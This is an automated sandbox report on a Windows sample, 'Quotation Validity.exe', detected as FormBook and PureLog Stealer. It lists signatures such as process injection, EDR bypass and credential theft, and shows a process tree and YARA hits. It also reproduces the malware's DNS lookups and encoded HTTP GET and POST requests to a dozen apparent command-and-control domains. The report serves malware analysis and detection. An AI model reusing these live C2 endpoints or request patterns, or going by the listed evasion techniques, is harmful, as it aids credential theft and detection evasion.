Windows Analysis Report
Quotation Validity.exe

Overview

General Information

Sample name: Quotation Validity.exe
Analysis ID: 1566632
MD5: 10f86c0378f3f9eabae2129174962df1
SHA1: 177887de20bd548063d7df47baf2893d519341a7
SHA256: 0ba8526b6a258a291665a487377351ede1601f0afcf74380556abbd789af669e
Tags: exe, user-adrian__luca
Infos:

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Quotation Validity.exe (PID: 7488 cmdline: "C:\Users\user\Desktop\Quotation Validity.exe" MD5: 10F86C0378F3F9EABAE2129174962DF1)
    • Quotation Validity.exe (PID: 7984 cmdline: "C:\Users\user\Desktop\Quotation Validity.exe" MD5: 10F86C0378F3F9EABAE2129174962DF1)
      • KnETAajUsFuuTQ.exe (PID: 6352 cmdline: "C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • isoburn.exe (PID: 5884 cmdline: "C:\Windows\SysWOW64\isoburn.exe" MD5: BF19DD525C7D23CAFC086E9CCB9C06C6)
          • KnETAajUsFuuTQ.exe (PID: 6680 cmdline: "C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 736 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000D.00000002.3734770459.0000000004C70000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.1713438377.0000000003BC0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.1306858110.0000000005E70000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.1698550308.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
2.2.Quotation Validity.exe.44324c8.1.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
2.2.Quotation Validity.exe.5e70000.5.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
2.2.Quotation Validity.exe.5e70000.5.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
2.2.Quotation Validity.exe.44324c8.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
9.2.Quotation Validity.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched
No Suricata rule has matched

                      AV Detection

                      Source: Quotation Validity.exe, Avira: detected
                      Source: Quotation Validity.exe, ReversingLabs: Detection: 68%
                      Source: Yara match, File source: 9.2.Quotation Validity.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 9.2.Quotation Validity.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 0000000D.00000002.3734770459.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000009.00000002.1713438377.0000000003BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000009.00000002.1698550308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000000C.00000002.3729826562.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000000C.00000002.3732445014.0000000004AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000009.00000002.1704236127.00000000016E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000000B.00000002.3732187285.0000000002910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                      Source: Quotation Validity.exe, Joe Sandbox ML: detected
                      Source: Quotation Validity.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Quotation Validity.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: isoburn.pdb source: Quotation Validity.exe, 00000009.00000002.1698898912.0000000000EE8000.00000004.00000020.00020000.00000000.sdmp, KnETAajUsFuuTQ.exe, 0000000B.00000002.3730617348.0000000000BF7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: isoburn.pdbGCTL source: Quotation Validity.exe, 00000009.00000002.1698898912.0000000000EE8000.00000004.00000020.00020000.00000000.sdmp, KnETAajUsFuuTQ.exe, 0000000B.00000002.3730617348.0000000000BF7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KnETAajUsFuuTQ.exe, 0000000B.00000002.3724874512.000000000056E000.00000002.00000001.01000000.0000000C.sdmp, KnETAajUsFuuTQ.exe, 0000000D.00000000.1771056364.000000000056E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: Quotation Validity.exe, 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.1699007606.0000000004AD7000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.1706016321.0000000004C84000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: Quotation Validity.exe, Quotation Validity.exe, 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 0000000C.00000003.1699007606.0000000004AD7000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.1706016321.0000000004C84000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 12_2_02A5C4E0 FindFirstFileW,FindNextFileW,FindClose
                      Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 12_2_02A49E40 4x nop then xor eax, eax
                      Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 12_2_04BD04F8 4x nop then mov ebx, 00000004h

                      Networking

                      Source: DNS query: www.cyperla.xyz
                      Source: DNS query: www.070002018.xyz
                      Source: Joe Sandbox View, IP Address: 146.88.233.115
                      Source: Joe Sandbox View, IP Address: 161.97.142.144
                      Source: Joe Sandbox View, ASN Name: CONTABODE
                      Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 02 Dec 2024 13:44:10 GMTserver: Apacheset-cookie: __tad=1733147050.6544345; expires=Thu, 30-Nov-2034 13:44:10 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 02 Dec 2024 13:44:12 GMTserver: Apacheset-cookie: __tad=1733147052.6846258; expires=Thu, 30-Nov-2034 13:44:12 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 02 Dec 2024 13:44:15 GMTserver: Apacheset-cookie: __tad=1733147055.5887323; expires=Thu, 30-Nov-2034 13:44:15 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
                      Source: global trafficHTTP traffic detected: GET /qygv/?_jVx=rlV0_TQ81&6NVpdLF=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4WgueYbl0NkgEkN4ghVwMkIOvivrFpog== HTTP/1.1Host: www.cyperla.xyzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /qx5d/?6NVpdLF=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iPppPRQa5ZmY++m+47QgCR+/iVNw4gjA==&_jVx=rlV0_TQ81 HTTP/1.1Host: www.cstrategy.onlineAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /6ou6/?_jVx=rlV0_TQ81&6NVpdLF=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t/Wjx9MdL3/Nu9eMgeVL6PZ2CHNoDSQ== HTTP/1.1Host: www.madhf.techAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /v89f/?6NVpdLF=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9kwLEpkgrXXmS6Zwq+X4n7/LWdMx9Q7w==&_jVx=rlV0_TQ81 HTTP/1.1Host: www.bser101pp.buzzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /8m07/?6NVpdLF=2dHIoPS/8uSmn0UQwBXvkZ7FsiKx9Udv3lXpG+Z7ZfR3/r1MA6yfaSEuuX1gcPtu0HplxKUHBw+SrOQKMJrrWZvRz659dWh9F4TBV1031x6bEqu3dQ==&_jVx=rlV0_TQ81 HTTP/1.1Host: www.goldstarfootwear.shopAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /6m2n/?6NVpdLF=Yw5byyKwEzNx0WEyNQXxwK69B8+8B5LUHYwp2f+G51jE3kEn7LG6s/p7OKNy20MANuawYrGFRZxpwvPhYVF0ur9kqRkxGnQ62VRV775xzcXmQMlZyg==&_jVx=rlV0_TQ81 HTTP/1.1Host: www.070002018.xyzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /7yhf/?_jVx=rlV0_TQ81&6NVpdLF=OF4p1YkyIdfCe7eLhNmLS9a71obvkkx5m6SnSx71uUBEXBHxoh5TWtGHsn9J2PYNIykLYH3RiXpaFAzmPgGro8YtWCJNiZpBxbyycKP3y6+8bNDuvw== HTTP/1.1Host: www.bienmaigrir.infoAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /wu7k/?6NVpdLF=msE8We8dGqsfRntWrquh0bsz2FoIUbe83S1Gvm9i1konD6ZBc3B28v2M3s5YR0KKFS9CfgF+yd8Vab4bVKVP+ofPy3OtxFAtreRUZwpBdqa4QiZw9w==&_jVx=rlV0_TQ81 HTTP/1.1Host: www.yc791022.asiaAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /ykgd/?_jVx=rlV0_TQ81&6NVpdLF=9oLAy+SEg8JXgI2TBYJ+cgbVH4pSJ447WKSBzbS4ZtdOlYE/G55wBiI45c0M4XnEo9VWh9C7p4Et5DP8QDQ/wtvWbtjylB0D75gbWHC72kMsIY/h9A== HTTP/1.1Host: www.jalan2.onlineAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /fbpt/?6NVpdLF=sHQWWiJRbY7Czg+pdBTXnWo2YpYQcCCmWGf9ZvbaXe6zmK6gq2rUy+H9V8T+CpeiS8UyZN5qWlRSJl8kNjqw9U1Fq6zryNJuPCt39bkn3VWjex276Q==&_jVx=rlV0_TQ81 HTTP/1.1Host: www.beyondfitness.liveAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /dm4p/?6NVpdLF=nAmjXBwFyC120iWFa15+GTz1nnoe6LyW/X6vA0SQviJnmQOR7pbzII6Li/fXSuLSC3cdwp3L3c1awzkuuw4AzFSQlsxYI3pCP4WG49cxd9TY9P6nbg==&_jVx=rlV0_TQ81 HTTP/1.1Host: www.dietcoffee.onlineAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /qtfx/?6NVpdLF=KdNk/QG/ntQJ0Ylui7yy1ELkvwiUPibsxCMWqIa/89W9m0NHjjmW45E2UxezVHfL5+2nDpZVQ4VEoa9MycOLKl2XaG/4RF1XL2skPecvq2g7m0aOng==&_jVx=rlV0_TQ81 HTTP/1.1Host: www.smartcongress.netAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficDNS traffic detected: DNS query: www.cyperla.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.cstrategy.online
                      Source: global trafficDNS traffic detected: DNS query: www.madhf.tech
                      Source: global trafficDNS traffic detected: DNS query: www.bser101pp.buzz
                      Source: global trafficDNS traffic detected: DNS query: www.goldstarfootwear.shop
                      Source: global trafficDNS traffic detected: DNS query: www.070002018.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.bienmaigrir.info
                      Source: global trafficDNS traffic detected: DNS query: www.yc791022.asia
                      Source: global trafficDNS traffic detected: DNS query: www.jalan2.online
                      Source: global trafficDNS traffic detected: DNS query: www.beyondfitness.live
                      Source: global trafficDNS traffic detected: DNS query: www.dietcoffee.online
                      Source: global trafficDNS traffic detected: DNS query: www.smartcongress.net
                      Source: global trafficDNS traffic detected: DNS query: www.alihones.lol
                      Source: unknownHTTP traffic detected: POST /qx5d/ HTTP/1.1Host: www.cstrategy.onlineAccept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-usOrigin: http://www.cstrategy.onlineContent-Length: 196Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedReferer: http://www.cstrategy.online/qx5d/User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 02 Dec 2024 13:43:36 GMTserver: LiteSpeed
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:44:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hNOKCjlPdwE%2FWPwY%2Fb38CilvJz6z9stpCoCA1NitIsgqppTexqMbRrA7UXSzMTmmfhAQvUnz10vk8K9akxmIR5tvE4s4Swawkcw2dMR%2BaArDznJlI6pMsMMl4bDghQxnFBMFBUs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc064eec2f793-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1477&min_rtt=1477&rtt_var=738&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=622&delivery_rate=0&cwnd=125&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:44:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ANfFGu7HhnZumRkzORjZnS9TSgw1HNt3h4WprfQ5EsPByNfdrGQfQ2Q2z5v%2FCfIqamuxFz4N1amkiLIWLMi6Y09gQ%2BNqyA8DwSoIBwVZiF7Kru9SMFocUs9lwwvMYbFf64IH6B4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc0755d2141c3-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2205&min_rtt=2205&rtt_var=1102&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=646&delivery_rate=0&cwnd=70&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Mon, 02 Dec 2024 13:44:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eH7Ad%2BIWLbwnMZL8Ric5%2FivIRXo0jPbWyv5DHW2vUH9PqS8ZIy8Z7jQXngurnukTBxJ%2BMEXKom2p0c6aavxnIFXdPgCho4c1AZibPftZ7pZuEIWCI1ruKNM7V7rNSbosZToRDFM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ebbc085e8a38c4d-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2023&min_rtt=2023&rtt_var=1011&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1659&delivery_rate=0&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Mon, 02 Dec 2024 13:44:33 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tn7aZzDRaom%2B5MRerP01lE%2FLZ7ggAbDVK7SDbJsz7rXguARlrgm%2BiuAkrrzCVi4JBhH6MjmQ0U%2F%2Bf9w7T0A9v5e6Tp2wmBfI924Dmscd7K4IntEV795bJhCHfogLqJp2%2BfbEeL0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ebbc096df771895-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1483&min_rtt=1483&rtt_var=741&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=357&delivery_rate=0&cwnd=183&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chro
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 02 Dec 2024 13:44:54 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
ETag: W/"66cce1df-b96"
Content-Encoding: gzip
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 02 Dec 2024 13:44:57 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
ETag: W/"66cce1df-b96"
Content-Encoding: gzip
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 02 Dec 2024 13:45:00 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
ETag: W/"66cce1df-b96"
Content-Encoding: gzip
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 02 Dec 2024 13:45:03 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2966
Connection: close
Vary: Accept-Encoding
ETag: "66cce1df-b96"
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 02 Dec 2024 13:45:10 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 02 Dec 2024 13:45:13 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 02 Dec 2024 13:45:16 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 02 Dec 2024 13:45:18 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Mon, 02 Dec 2024 13:45:26 GMT
Server: Apache
Content-Length: 263
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Mon, 02 Dec 2024 13:45:29 GMT
Server: Apache
Content-Length: 263
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Mon, 02 Dec 2024 13:45:35 GMT
Server: Apache
Content-Length: 263
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
content-type: text/html
cache-control: private, no-cache, max-age=0
pragma: no-cache
date: Mon, 02 Dec 2024 13:45:42 GMT
server: LiteSpeed
content-encoding: gzip
vary: Accept-Encoding
transfer-encoding: chunked
connection: close
Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a
Data Ascii: a
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
content-type: text/html
cache-control: private, no-cache, max-age=0
pragma: no-cache
date: Mon, 02 Dec 2024 13:45:44 GMT
server: LiteSpeed
content-encoding: gzip
vary: Accept-Encoding
transfer-encoding: chunked
connection: close
Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a
Data Ascii: a
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
content-type: text/html
cache-control: private, no-cache, max-age=0
pragma: no-cache
date: Mon, 02 Dec 2024 13:45:47 GMT
server: LiteSpeed
content-encoding: gzip
vary: Accept-Encoding
transfer-encoding: chunked
connection: close
Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a
Data Ascii: a
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
content-type: text/html
cache-control: private, no-cache, max-age=0
pragma: no-cache
content-length: 1249
date: Mon, 02 Dec 2024 13:45:49 GMT
server: LiteSpeed
connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 02 Dec 2024 13:45:56 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
